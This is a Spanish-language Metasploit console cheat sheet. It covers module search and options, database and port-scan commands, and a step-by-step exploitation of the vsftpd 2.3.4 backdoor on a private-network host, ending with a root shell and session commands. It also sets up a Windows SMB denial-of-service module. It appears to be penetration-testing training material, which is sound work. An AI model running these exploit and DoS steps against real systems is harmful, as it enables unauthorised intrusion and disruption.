[metasploit]. Consola centralizada con acceso a todo las opciones disponibles de Metasploit Framework, única soportada y estable con soporte para de edición de lineas (readline), que permite tabulacion y ejecución de comandos externos.
msf > ping -c 1 192.168.1.10 (usar ping)
msf > nmap 192.168.1.10 (usar nmnap)
msf > help (ayuda)
msf > show (mostrar módulos disponibles)
msf > show auxiliary (mostrar módulos auxiliares [scanners, modulos de denial of service, fuzzers...]
msf > show exploits (obtener una lista de todos los exploits)
msf > show payloads (mostrar listado de los diferentes payloads y para las plataformas disponibles)
Nota.- Cuando se está usando un determinado exploit, "show payloads" solo mostrará los que son compatibles para ese exploit concreto.
msf exploit(ms08_067_netapi) > show options (Seleccionado un módulo y mostrar opciones disponibles y/o requeridas para ese concreto)
msf exploit(ms08_067_netapi) > show targets (mostrar objetivos soportados)
msf exploit(ms08_067_netapi) > show advanced (mostrar las opciones avanzadas de un exploit)
msf > search ms09-001 (buscar cadenas de texto dentro del módulo)
msf > info dos/windows/smb/ms09_001_write (información detallada [opciones, objetivos....] sobre un determinado modulo)
msf > use dos/windows/smb/ms09_001_write (escogido el módulo en particular, seleccionarlo con)
msf auxiliary(ms09_001_write) > show options (mirar sus opciones requeridas)
msf > connect 192.168.1.10 23 (conectar a una Ip y a un puerto)
msf auxiliary(ms09_001_write) > set RHOST 192.168.1.10 (configurar las opciones del modulo que se está utilizando)
msf auxiliary(ms09_001_write) > show options (comprobar de nuevo las opciones del módulo)
msf exploit(ms08_067_netapi) > show encoders (mostrar codificaciones disponibles)
msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai (escoger la deseada)
msf exploit(ms04_045_wins) > check (comprobar si un objetivo es vulnerable a un exploit sin explotar la vulnerabilidad)
msf > unset RHOST (suprimir una variable entrada para un módulo)
msf auxiliary(ms09_001_write) > run (lanzar un exploit)
msf auxiliary(ms09_001_write) > back (salir del módulo)
msf > irb (cambiar al modo de edición de scripts en ruby)
1.-
Para establecer una variable global [setg - save]:
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136
msf > save
Saved configuration to: /root/.msf3/config
msf > unsetg RHOST (suprimir una variable global)
2.-
Algunos comandos relacionados con la base de datos propia de metasploit:
msf > db_status (Mostrar el estado de la conexión a la BDs y nombre)
msf > db_nmap 192.168.1.10 (Lanzar nmap y guardar el resultado en la BDs)
msf > hosts (Muestra todos los informes de la BDs)
msf > hosts 192.168.1.10 (Muestra sólo el informe de la ip especificada)
msf > services (Muestra todos los servicios de la BDs incluso los inactivos)
msf > services -u -R 192.168.1.10 (Muestra los servicios activos [u] del host especificado [R])
3.-
Ejemplo de muestra de un scan de puertos:
msf > search portscan (exploradores de puertos disponibles)
Nota.- Los escáners y la mayoría de módulos auxiliares usan la opción RHOSTS en vez de RHOST y puede ser un rango de IP [192.168.1.10-192.168.1.50], rangos CIDR (192.168.1.0/24), múltiples rangos separados por comas (192.168.1.0/24, 192.168.3.0/24) y una lista en un archivo con una ip por linea (file:/tmp/hostlist.txt).
msf > use scanner/portscan/tcp ((para escoger el escaneador de puertos a usar)
msf > auxiliary(tcp) > show options (comprobar si falta algún parámetro [RHOSTS])
msf > auxiliary(tcp) > set RHOSTS 192.168.1.10 (entrar la ip donde dirigir el escaneo)
msf > auxiliary(tcp) > run (arancar el escaneo)
Todos los módulos scanner tiene el valor THREADS en "1". Este valor establece el número de subprocesos simultaneos que se utilizan durante la exploración. Un número superior acelera las exploraciones pero aumenta el tráfico en la red.
msf > set THREADS 50 (para modificar el valor)
4.-
Ejemplo de muestra de un ataque
maf > use exploit/unix/ftp/vsftpd_234_backdoor
Comprobar parámetros que faltan:
msf > exploit(vsftpd_234_backdoor) > show options
Entrar el parámetro RHOST [la IP atacada]
msf > exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.10
Comprobar nuevamente si el parámetro ha entrado correctamente:
msf > exploit(vsftpd_234_backdoor) > show options
Lanzar el exploit en segundo plano [j] y mostrando una salida positiva en la que se abre una shell en la máquina remota:
msf > exploit(vsftpd_234_backdoor) > exploit -j
[*] Exploit running as background job.
[*] Banner: 220 (vsFTPD 2.3.4)
[*] USERR: 331 Please specify the password.
msf exploit(vsftpd_234_backdoor) > [+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.15:49654 -> 192.168.1.10:6200) at 2013-07-07 08:06:30 -0400
msf > exploit(vsftpd_234_backdoor) > sessions -l (mostrar las sesiones abiertas [ID de la sesion, puertos abiertos, máquina remota, local...])
msf > exploit(vsftpd_234_backdoor) > sessions -c ifconfig (ejecutar un comando en todas las shells abiertas y mostradas con sessions -l)
msf > exploit(vsftpd_234_backdoor) > sessions -i 1 (entrar en la session con ID 1)
[*] Starting interaction with 1...
A partir de este punto estamos en una shell clásica de linux del host 192.168.1.10 donde podemos usar todos los comandos propios de dichas shells.